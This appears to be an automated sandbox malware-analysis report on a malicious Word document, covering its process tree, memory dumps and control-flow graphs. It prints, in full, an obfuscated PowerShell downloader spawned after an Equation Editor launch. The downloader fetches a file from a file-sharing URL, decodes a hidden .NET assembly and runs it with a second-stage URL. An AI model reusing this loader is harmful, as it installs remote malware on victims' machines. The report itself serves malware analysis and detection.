                                                                            2024-11-07 15:51:02 UTC8192INData Raw: 59 57 bd 00 36 92 3a 13 c1 3c 06 b6 a7 c7 34 5a 59 57 56 27 5d 5b 99 df 6c b2 a9 6f 2c 28 50 e9 19 55 e2 d5 80 1c d7 52 5b b1 f3 b2 f8 b4 5a b1 0b 6b b5 4d 34 cc b3 29 7d bb 56 2d f1 aa 82 45 72 a2 8d ed 00 d8 35 bb 82 73 f5 7a 78 a3 2a f0 3c 92 69 a4 b3 1b 3a 32 fc 0a dd 51 2b cf 22 c5 1b e0 9a c4 88 5d b2 31 0c 08 20 02 a2 d4 1f 8d fc 8f e5 81 a1 e2 1a 98 b5 0d a4 84 f9 2b 1a 21 0d 2c 51 95 53 6c 4b 30 b1 b8 f5 3c 50 03 a0 15 58 8c d2 a3 93 22 a8 5d c5 95 94 5f 03 76 e0 4f f2 ff 00 87 3a 10 95 24 93 ac 85 59 58 23 21 00 06 1c 8e 3d ac 8f cf 15 77 2e cc cc 6c 93 66 85 5e 05 c6 dd a4 ee 50 2d 7d fd 8e 18 6a 21 54 e0 7f 19 3b 41 20 d5 11 d7 eb 89 76 eb 91 58 0d 3c 81 82 aa 05 04 6e e9 7d 08 f8 e1 a0 96 34 68 dc 95 b0 56 e8 10 78 20 f2 3a 11 43 b7 38 87 d7
                                                                            Data Ascii: YW6:<4ZYWV'][lo,(PUR[ZkM4)}V-Er5szx*<i:2Q+"]1 +!,QSlK0<PX"]_vO:$YX#!=w.lf^P-}j!T;A vX<n}4hVx :C8


                                                                            Click to jump to process

                                                                            Click to jump to process

                                                                            Click to dive into process behavior distribution

                                                                            Click to jump to process

                                                                            Target ID:0
                                                                            Start time:10:50:48
                                                                            Start date:07/11/2024
                                                                            Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                                            Imagebase:0x13f9b0000
                                                                            File size:1'423'704 bytes
                                                                            MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:false

                                                                            Target ID:2
                                                                            Start time:10:50:49
                                                                            Start date:07/11/2024
                                                                            Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                                            Imagebase:0x400000
                                                                            File size:543'304 bytes
                                                                            MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:5
                                                                            Start time:10:50:53
                                                                            Start date:07/11/2024
                                                                            Path:C:\Windows\SysWOW64\wscript.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\gdfgcvbi.vbs"
                                                                            Imagebase:0xad0000
                                                                            File size:141'824 bytes
                                                                            MD5 hash:979D74799EA6C8B8167869A68DF5204A
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:6
                                                                            Start time:10:50:54
                                                                            Start date:07/11/2024
                                                                            Path:C:\Windows\SysWOW64\wscript.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\gDHxsqtDodRnltJFOd.js"
                                                                            Imagebase:0xad0000
                                                                            File size:141'824 bytes
                                                                            MD5 hash:979D74799EA6C8B8167869A68DF5204A
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:7
                                                                            Start time:10:50:58
                                                                            Start date:07/11/2024
                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LgAgACgAIAAoAFsAUwB0AHIAaQBuAEcAXQAkAHYARQBSAEIAbwBTAGUAUAByAGUARgBFAHIAZQBOAGMAZQApAFsAMQAsADMAXQArACcAeAAnAC0AagBvAEkAbgAnACcAKQAoACgAJwBLADYAcABpAG0AYQBnAGUAVQByAGwAJwArACcAIAA9ACAAcwAnACsAJwBTAFgAaAB0AHQAcABzADoALwAnACsAJwAvADEAMAAxADcALgBmAGkAbABlAG0AYQBpAGwALgBjAG8AbQAnACsAJwAvAGEAcABpACcAKwAnAC8AZgBpAGwAZQAvAGcAZQB0AD8AZgBpAGwAZQBrAGUAeQAnACsAJwA9ADIAJwArACcAQQBhACcAKwAnAF8AYgBXAG8AOQBSAGUAdQA0ADUAdAA3AEIAVQAxAGsAVgBnAHMAZAA5ACcAKwAnAHAAVAA5AHAAJwArACcAZwBTAFMAbAB2AFMAdABHAHIAbgBUAEkAJwArACcAQwBmAEYAaABtAFQASwBqACcAKwAnADMATABDADYAUwBRAHQASQBjAE8AYwBfAFQAMwA1AHcAJgBwAGsAXwB2AGkAZAA9AGYAZAA0AGYANgAxADQAYgBiADIAMAA5AGMANgAyAGMAMQA3ADMAMAA5ADQANQAxADcANgBhADAAOQAwADQAZgAgAHMAUwBYADsASwA2AHAAdwBlAGIAQwBsAGkAZQBuAHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDACcAKwAnAGwAaQBlAG4AdAA7AEsANgBwAGkAbQBhAGcAZQBCAHkAdABlAHMAIAA9ACAASwA2AHAAdwBlACcAKwAnAGIAQwBsAGkAZQBuAHQALgBEAG8AdwBuAGwAbwBhACcAKwAnAGQARABhAHQAYQAoAEsANgBwAGkAbQBhAGcAZQBVAHIAbAApADsASwA2AHAAaQBtAGEAZwBlAFQAZQB4AHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgASwA2AHAAaQBtAGEAZwBlAEIAeQB0AGUAcwApADsASwA2AHAAcwB0AGEAcgB0AEYAbABhAGcAIAA9ACAAcwBTAFgAPAA8AEIAQQBTAEUANgA0AF8AUwBUAEEAUgBUAD4APgBzAFMAWAA7AEsANgBwAGUAbgBkAEYAbABhAGcAIAA9ACAAcwAnACsAJwBTAFgAPAA8AEIAQQBTAEUANgA0AF8ARQAnACsAJwBOAEQAPgA+AHMAUwBYADsASwA2AHAAcwB0AGEAcgAnACsAJwB0AEkAbgBkAGUAeAAgAD0AIABLADYAcABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKABLADYAcABzAHQAYQByAHQARgBsAGEAZwApADsASwA2AHAAZQBuAGQASQBuAGQAZQB4ACAAPQAgAEsANgBwAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoAEsANgBwAGUAbgBkAEYAbABhAGcAKQA7AEsAJwArACcANgBwAHMAdABhAHIAdABJAG4AZABlAHgAIAAtAGcAZQAgADAAIAAtAGEAbgBkACAASwA2AHAAZQBuAGQASQBuAGQAZQB4ACAALQBnAHQAJwArACcAIABLADYAcABzAHQAYQByAHQASQBuAGQAZQB4ADsASwA2AHAAcwB0AGEAcgB0AEkAbgBkAGUAeAAgACsAPQAgAEsANgBwAHMAdABhAHIAdABGAGwAYQBnAC4ATABlAG4AZwB0AGgAOwBLADYAcABiAGEAcwBlADYANABMAGUAbgBnAHQAaAAgAD0AIABLADYAcABlAG4AZABJAG4AZABlAHgAIAAtACAASwA2AHAAcwB0AGEAcgB0AEkAbgBkAGUAeAA7AEsANgBwAGIAYQBzAGUANgAnACsAJwA0AEMAbwBtAG0AYQBuAGQAIAA9ACAASwA2AHAAaQBtAGEAZwBlACcAKwAnAFQAZQB4AHQALgBTAHUAYgBzAHQAcgBpAG4AZwAoAEsANgBwAHMAdABhAHIAdABJAG4AZABlAHgALAAgAEsANgBwAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACkAOwBLADYAcABiAGEAcwBlADYANABSAGUAdgBlAHIAcwBlAGQAIAA9ACAALQBqAG8AaQBuACAAKABLADYAcABiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkAC4AVABvAEMAaABhAHIAQQByAHIAJwArACcAYQB5ACgAKQAgACcAKwAnAGgATgBMACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAgAEsANgBwAF8AIAB9ACkAWwAtADEAJwArACcALgAuAC0AKABLADYAcABiAGEAcwBlADYANABDAG8AbQAnACsAJwBtAGEAbgBkAC4ATABlAG4AZwB0AGgAKQBdADsASwA2AHAAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAEsANgBwAGIAYQBzAGUANgA0AFIAZQB2AGUAcgAnACsAJwBzAGUAZAApADsASwA2AHAAbABvAGEAZABlAGQAQQBzAHMAZQBtAGIAbAB5ACAAPQAgAFsAUwB5AHMAJwArACcAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAJwArACcAbwBhAGQAKABLACcAKwAnADYAcABjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwApADsASwA2AHAAdgBhAGkATQBlAHQAaABvAGQAIAA9ACAAWwBkAG4AJwArACcAbABpAGIALgBJAE8ALgBIAG8AbQBlAF0ALgBHAGUAdABNACcAKwAnAGUAdABoAG8AZAAoAHMAUwBYAFYAQQBJAHMAUwBYACkAOwBLADYAcAB2AGEAaQBNAGUAdABoAG8AZAAuAEkAbgAnACsAJwB2AG8AawAnACsAJwBlACgASwA2AHAAbgB1AGwAJwArACcAbAAsACAAQAAoAHMAUwBYAHQAeAB0AC4ATABTAFMAVwBTAC8AawBsAG8ALwB1AGUALgBoAHMAdQBwAHcAcwByAGUAbABsAG8AcgAuAHMAdQBwAC8ALwA6AHAAdAB0AGgAcwBTAFgALAAgAHMAUwBYAGQAZQBzAGEAdABpAHYAYQBkAG8AcwBTAFgALAAgAHMAUwBYAGQAZQBzAGEAdABpAHYAYQBkAG8AcwBTAFgALAAgAHMAUwBYAGQAZQBzAGEAdAAnACsAJwBpAHYAYQBkAG8AcwBTAFgALAAgAHMAUwBYAGQAZQBzAGEAdABpAHYAJwArACcAYQBkAG8AcwBTAFgALAAgAHMAUwBYADEAcwBTAFgALAAgAHMAUwBYAE8AbgBlAEQAcgBpAHYAZQBTAGUAdAB1AHAAcwBTAFgALABzAFMAWABkAGUAcwBhAHQAaQB2AGEAZABvAHMAUwBYACwAIABzAFMAWABkAGUAcwBhAHQAaQB2AGEAZABvAHMAUwBYACwAcwBTAFgAZABlAHMAYQB0AGkAdgBhAGQAbwBzAFMAWAAnACsAJwAsAHMAUwBYAGQAJwArACcAZQBzAGEAdABpAHYAYQBkAG8AcwBTAFgALABzAFMAWABkAGUAcwBhAHQAaQB2AGEAZABvAHMAUwBYACwAcwBTAFgAMQBzAFMAWAAsAHMAUwBYAGQAZQBzACcAKwAnAGEAdABpAHYAYQBkAG8AcwBTAFgAKQApADsAJwApAC4AcgBFAFAATABBAGMAZQAoACcASwA2AHAAJwAsAFsAUwB0AHIASQBOAEcAXQBbAEMAaABhAFIAXQAzADYAKQAuAHIARQBQAEwAQQBjAGUAKAAnAGgATgBMACcALAAnAHwAJwApAC4AcgBFAFAATABBAGMAZQAoACgAWwBDAGgAYQBSAF0AMQAxADUAKwBbAEMAaABhAFIAXQA4ADMAKwBbAEMAaABhAFIAXQA4ADgAKQAsAFsAUwB0AHIASQBOAEcAXQBbAEMAaABhAFIAXQAzADkAKQAgACkA';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                                            Imagebase:0xe90000
                                                                            File size:427'008 bytes
                                                                            MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:9
                                                                            Start time:10:50:58
                                                                            Start date:07/11/2024
                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( ([StrinG]$vERBoSePreFEreNce)[1,3]+'x'-joIn'')(('K6pimageUrl'+' = s'+'SXhttps:/'+'/1017.filemail.com'+'/api'+'/file/get?filekey'+'=2'+'Aa'+'_bWo9Reu45t7BU1kVgsd9'+'pT9p'+'gSSlvStGrnTI'+'CfFhmTKj'+'3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f sSX;K6pwebClient = New-Object System.Net.WebC'+'lient;K6pimageBytes = K6pwe'+'bClient.Downloa'+'dData(K6pimageUrl);K6pimageText = [System.Text.Encoding]::UTF8.GetString(K6pimageBytes);K6pstartFlag = sSX<<BASE64_START>>sSX;K6pendFlag = s'+'SX<<BASE64_E'+'ND>>sSX;K6pstar'+'tIndex = K6pimageText.IndexOf(K6pstartFlag);K6pendIndex = K6pimageText.IndexOf(K6pendFlag);K'+'6pstartIndex -ge 0 -and K6pendIndex -gt'+' K6pstartIndex;K6pstartIndex += K6pstartFlag.Length;K6pbase64Length = K6pendIndex - K6pstartIndex;K6pbase6'+'4Command = K6pimage'+'Text.Substring(K6pstartIndex, K6pbase64Length);K6pbase64Reversed = -join (K6pbase64Command.ToCharArr'+'ay() '+'hNL ForEach-Object { K6p_ })[-1'+'..-(K6pbase64Com'+'mand.Length)];K6pcommandBytes = [System.Convert]::FromBase64String(K6pbase64Rever'+'sed);K6ploadedAssembly = [Sys'+'tem.Reflection.Assembly]::L'+'oad(K'+'6pcommandBytes);K6pvaiMethod = [dn'+'lib.IO.Home].GetM'+'ethod(sSXVAIsSX);K6pvaiMethod.In'+'vok'+'e(K6pnul'+'l, @(sSXtxt.LSSWS/klo/ue.hsupwsrellor.sup//:ptthsSX, sSXdesativadosSX, sSXdesativadosSX, sSXdesat'+'ivadosSX, sSXdesativ'+'adosSX, sSX1sSX, sSXOneDriveSetupsSX,sSXdesativadosSX, sSXdesativadosSX,sSXdesativadosSX'+',sSXd'+'esativadosSX,sSXdesativadosSX,sSX1sSX,sSXdes'+'ativadosSX));').rEPLAce('K6p',[StrING][ChaR]36).rEPLAce('hNL','|').rEPLAce(([ChaR]115+[ChaR]83+[ChaR]88),[StrING][ChaR]39) )"
                                                                            Imagebase:0xe90000
                                                                            File size:427'008 bytes
                                                                            MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:10
                                                                            Start time:10:51:13
                                                                            Start date:07/11/2024
                                                                            Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                                            Imagebase:0x400000
                                                                            File size:543'304 bytes
                                                                            MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:false

                                                                            Reset < >
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.358961758.00000000002CF000.00000004.00000020.00020000.00000000.sdmp, Offset: 002CF000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_2cf000_EQNEDT32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c2e03af581d53bbf649821cc771dc2cad532113a869b682bc7445ff8ed47ff3f
                                                                              • Instruction ID: 0b650a24b3c6df4f3d930791b19481713a876c65a083b6b333c2703103ac9092
                                                                              • Opcode Fuzzy Hash: c2e03af581d53bbf649821cc771dc2cad532113a869b682bc7445ff8ed47ff3f
                                                                              • Instruction Fuzzy Hash: E0C1BB9680E7C15FE7038B3458697903FB09F63205F0F4AEBC4C4CB2A7D658495AC7A2
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.481607805.000000000021D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0021D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_21d000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d6939b3d74efb0eafc3344e1770bcf7e2e94e3ae0ab0f354219eb9fa58aad431
                                                                              • Instruction ID: 6584ec9ee89ed71ad82592c107b9e14242973b26f270bf8deba58dfa09637f13
                                                                              • Opcode Fuzzy Hash: d6939b3d74efb0eafc3344e1770bcf7e2e94e3ae0ab0f354219eb9fa58aad431
                                                                              • Instruction Fuzzy Hash: 3A01A771524340EFE7148E15CCC47A7BBD8DF69764F18C519DD490F182C3799985C6B1
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.481607805.000000000021D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0021D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_21d000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 6e10091deecd7862c6efc96d32832526bb0501b52a092983b115a6c99f427f1c
                                                                              • Instruction ID: cf6700064830a14869b9e0c0f8d33cb1162c9ae24ca373c959f530f378d3db5b
                                                                              • Opcode Fuzzy Hash: 6e10091deecd7862c6efc96d32832526bb0501b52a092983b115a6c99f427f1c
                                                                              • Instruction Fuzzy Hash: 2AF06271504244EEE7148E15CCC4BA2FBD8EB95764F18C55AED485B282C3799C85CAB1

                                                                              Execution Graph

                                                                              Execution Coverage:6.4%
                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                              Signature Coverage:0%
                                                                              Total number of Nodes:23
                                                                              Total number of Limit Nodes:2
                                                                              execution_graph 15420 7391af 15421 739199 15420->15421 15423 739284 15421->15423 15425 7392be 15421->15425 15422 73927a 15426 7392ef 15425->15426 15427 739311 15426->15427 15429 73932c 15426->15429 15435 7392be 2 API calls 15426->15435 15436 739348 15426->15436 15427->15422 15428 739450 15431 739c2d CreateProcessW 15428->15431 15433 7398f7 15428->15433 15429->15428 15443 73874c 15429->15443 15432 739ca1 15431->15432 15433->15422 15435->15426 15437 7393c5 15436->15437 15438 73874c CreateProcessW 15437->15438 15441 739450 15437->15441 15438->15441 15439 739c2d CreateProcessW 15440 739ca1 15439->15440 15441->15439 15442 7398f7 15441->15442 15442->15426 15444 739b48 CreateProcessW 15443->15444 15446 739ca1 15444->15446

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1282 739348-7393f9 1286 739b31-739bc1 1282->1286 1287 7393ff-73940f 1282->1287 1290 739bc3-739bc6 1286->1290 1291 739bc9-739bd0 1286->1291 1292 739411-739416 1287->1292 1293 739418 1287->1293 1290->1291 1294 739bd2-739bd8 1291->1294 1295 739bdb-739bf1 1291->1295 1296 73941a-73941c 1292->1296 1293->1296 1294->1295 1297 739bf3-739bf9 1295->1297 1298 739bfc-739c9f CreateProcessW 1295->1298 1299 739433-739452 call 73874c 1296->1299 1300 73941e-739431 1296->1300 1297->1298 1307 739ca1-739ca7 1298->1307 1308 739ca8-739d20 1298->1308 1305 739454-739459 1299->1305 1306 73945b 1299->1306 1300->1299 1309 73945d-73945f 1305->1309 1306->1309 1307->1308 1326 739d32-739d39 1308->1326 1327 739d22-739d28 1308->1327 1310 739aa7-739aba 1309->1310 1311 739465-73947a 1309->1311 1323 739ac1-739ad7 1310->1323 1317 739aa2 1311->1317 1318 739480-7394a4 1311->1318 1317->1310 1318->1323 1328 7394aa-7394bd call 738758 1318->1328 1323->1286 1339 739ad9-739ae3 1323->1339 1330 739d50 1326->1330 1331 739d3b-739d4a 1326->1331 1327->1326 1337 7394c3-7394ca 1328->1337 1338 739a45-739a47 1328->1338 1336 739d51 1330->1336 1331->1330 1336->1336 1340 7394d0-7394da 1337->1340 1341 739a2b-739a3e 1337->1341 1345 739ae5-739aec 1339->1345 1346 739aee-739af0 1339->1346 1340->1323 1343 7394e0-7394fd 1340->1343 1341->1338 1343->1317 1344 739503-73951d call 738764 1343->1344 1354 739523-73952a 1344->1354 1355 739a4c 1344->1355 1349 739af2-739af6 1345->1349 1346->1349 1351 739af8 call 737a54 1349->1351 1352 739afd-739b0a 1349->1352 1351->1352 1368 739b11-739b2e 1352->1368 1369 739b0c 1352->1369 1357 739a11-739a24 1354->1357 1358 739530-739539 1354->1358 1362 739a53 1355->1362 1357->1341 1360 7395a4-7395aa 1358->1360 1361 73953b-73957f 1358->1361 1360->1317 1365 7395b0-7395c0 1360->1365 1372 739581-739587 1361->1372 1373 739588-739594 1361->1373 1366 739a5d 1362->1366 1365->1317 1374 7395c6-739619 1365->1374 1375 739a64 1366->1375 1369->1368 1372->1373 1373->1362 1376 73959a-73959e 1373->1376 1384 739622-739640 1374->1384 1385 73961b-739621 1374->1385 1380 739a6b 1375->1380 1376->1360 1378 7399f7-739a0a 1376->1378 1378->1357 1383 739a72 1380->1383 1387 739a79 1383->1387 1384->1366 1388 739646-73964d 1384->1388 1385->1384 1393 739a83 1387->1393 1390 739653-73965a 1388->1390 1391 7396d4-7396db 1388->1391 1390->1375 1394 739660-739667 1390->1394 1391->1380 1392 7396e1-7396e8 1391->1392 1395 7396ee-739709 call 738770 1392->1395 1396 7399dd-7399f0 1392->1396 1399 739a8a 1393->1399 1394->1391 1397 739669-7396bb 1394->1397 1395->1383 1405 73970f-739716 1395->1405 1396->1378 1403 7396c4-7396ce 1397->1403 1404 7396bd-7396c3 1397->1404 1406 739a91 1399->1406 1403->1391 1404->1403 1408 7399c3-7399d6 1405->1408 1409 73971c-739725 1405->1409 1410 739a9b 1406->1410 1408->1396 1409->1317 1412 73972b-739731 1409->1412 1410->1317 1412->1317 1413 739737-739742 1412->1413 1413->1317 1417 739748-73974e 1413->1417 1418 739851-739862 1417->1418 1419 739754-739759 1417->1419 1418->1317 1423 739868-73987c call 738770 1418->1423 1419->1317 1420 73975f-739772 1419->1420 1420->1317 1424 739778-73978b 1420->1424 1423->1399 1428 739882-739889 1423->1428 1424->1317 1431 739791-7397a6 1424->1431 1429 73998f-7399a2 1428->1429 1430 73988f-739895 1428->1430 1446 7399a9-7399bc 1429->1446 1430->1317 1432 73989b-7398ac 1430->1432 1431->1387 1436 7397ac-7397b0 1431->1436 1432->1406 1437 7398b2-7398b6 1432->1437 1439 739837-73983a 1436->1439 1440 7397b6-7397bf 1436->1440 1441 7398c1-7398c9 1437->1441 1442 7398b8-7398bb 1437->1442 1439->1317 1443 739840-739843 1439->1443 1440->1317 1444 7397c5-7397c8 1440->1444 1441->1317 1445 7398cf-7398d9 1441->1445 1442->1441 1443->1317 1447 739849-73984b 1443->1447 1444->1317 1448 7397ce-7397fe 1444->1448 1445->1323 1449 7398df-7398f1 call 73877c 1445->1449 1446->1408 1447->1418 1447->1419 1448->1317 1457 739804-739824 call 738770 1448->1457 1449->1410 1455 7398f7-7398fe 1449->1455 1458 739900-73993e 1455->1458 1459 73995b-73996e 1455->1459 1457->1393 1464 73982a-739831 1457->1464 1465 739940-739946 1458->1465 1466 739947-739954 1458->1466 1468 739975-739988 1459->1468 1464->1439 1464->1446 1465->1466 1467 739956 1466->1467 1466->1468 1467->1369 1468->1429
                                                                              APIs
                                                                              • CreateProcessW.KERNEL32(00000000,?,00000009,?,?,?,?,?,?,?), ref: 00739C8C
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.419975672.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_730000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID: CreateProcess
                                                                              • String ID:
                                                                              • API String ID: 963392458-0
                                                                              • Opcode ID: 9fe43e24e6ddf8a58db9df12028fd8a21707b88d5e3027d2a5baaea157bd0a81
                                                                              • Instruction ID: 3599b1c209465da605c0f4146a5bd9d7ec4d997760cd5816b333a93ad69d870c
                                                                              • Opcode Fuzzy Hash: 9fe43e24e6ddf8a58db9df12028fd8a21707b88d5e3027d2a5baaea157bd0a81
                                                                              • Instruction Fuzzy Hash: 5842C470A00218CFEB24CF65CC54BDDB7B2AF85304F1485A9E549AB392DBB89E85CF51
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.420049703.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7f0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: <4Pe$<4Pe$<4Pe$<4Pe$<4Pe$<4Pe$@#Qe$@#Qe$@#Qe$@#Qe$@#Qe$@#Qe$@#Qe$@#Qe$@#Qe$@#Qe$@#Qe$@#Qe$@#Qe$@#Qe$@#Qe$@#Qe$TMe$h{s$h{s$h{s
                                                                              • API String ID: 0-3389351136
                                                                              • Opcode ID: d0ebc68432aa17b0dbbd56faba600e13f27165f1ff8070b291b1d7076db2ca51
                                                                              • Instruction ID: c42048994aa534a3fe3c9feb3b0d0afa82ae8d4153daabbf04726e441f4ab24e
                                                                              • Opcode Fuzzy Hash: d0ebc68432aa17b0dbbd56faba600e13f27165f1ff8070b291b1d7076db2ca51
                                                                              • Instruction Fuzzy Hash: D5B22431B04349DFDB259A68C850B7ABBF2AF81311F2480BAD655CB351DB39CE41C7A2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.420049703.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7f0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @#Qe$@#Qe$@#Qe$@#Qe$@#Qe$@#Qe$@#Qe$@#Qe
                                                                              • API String ID: 0-2224803389
                                                                              • Opcode ID: a5bf3feb852d23bb44495daab3cda49dde0cf2bdabef6e4e0e46c780ee609bc1
                                                                              • Instruction ID: 3d8a9ba1f0486246545fe993f9ce2a57f5f4d066c625143f174d25e468980848
                                                                              • Opcode Fuzzy Hash: a5bf3feb852d23bb44495daab3cda49dde0cf2bdabef6e4e0e46c780ee609bc1
                                                                              • Instruction Fuzzy Hash: F8220431B04749CFDB149B68D44467ABBF2AFC5320B28C0AAD749CB351DA39DD42C7A2

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 663 7f0ad0-7f0af3 664 7f0cce-7f0d13 663->664 665 7f0af9-7f0afe 663->665 677 7f0e6a-7f0e85 664->677 678 7f0d19-7f0d1e 664->678 666 7f0b16-7f0b1a 665->666 667 7f0b00-7f0b06 665->667 668 7f0c7b-7f0c85 666->668 669 7f0b20-7f0b24 666->669 671 7f0b0a-7f0b14 667->671 672 7f0b08 667->672 673 7f0c87-7f0c90 668->673 674 7f0c93-7f0c99 668->674 675 7f0b37 669->675 676 7f0b26-7f0b35 669->676 671->666 672->666 682 7f0c9f-7f0cab 674->682 683 7f0c9b-7f0c9d 674->683 684 7f0b39-7f0b3b 675->684 676->684 704 7f0e8f-7f0eb6 677->704 705 7f0e87-7f0e8c 677->705 679 7f0d36-7f0d3a 678->679 680 7f0d20-7f0d26 678->680 688 7f0e17-7f0e21 679->688 689 7f0d40-7f0d42 679->689 685 7f0d2a-7f0d34 680->685 686 7f0d28 680->686 687 7f0cad-7f0ccb 682->687 683->687 684->668 690 7f0b41-7f0b61 684->690 685->679 686->679 696 7f0e2f-7f0e35 688->696 697 7f0e23-7f0e2c 688->697 693 7f0d44-7f0d50 689->693 694 7f0d52 689->694 723 7f0b63-7f0b7e 690->723 724 7f0b80 690->724 701 7f0d54-7f0d56 693->701 694->701 698 7f0e3b-7f0e47 696->698 699 7f0e37-7f0e39 696->699 706 7f0e49-7f0e67 698->706 699->706 701->688 707 7f0d5c-7f0d60 701->707 708 7f0ebc-7f0ec1 704->708 709 7f1023-7f1052 704->709 705->704 713 7f0d62-7f0d7e 707->713 714 7f0d80 707->714 710 7f0ed9-7f0edd 708->710 711 7f0ec3-7f0ec9 708->711 742 7f1085-7f10ad 709->742 743 7f1054-7f1059 709->743 720 7f0ee3-7f0ee5 710->720 721 7f0fd2-7f0fdc 710->721 717 7f0ecd-7f0ed7 711->717 718 7f0ecb 711->718 719 7f0d82-7f0d84 713->719 714->719 717->710 718->710 719->688 728 7f0d8a-7f0da5 719->728 730 7f0ee7-7f0ef3 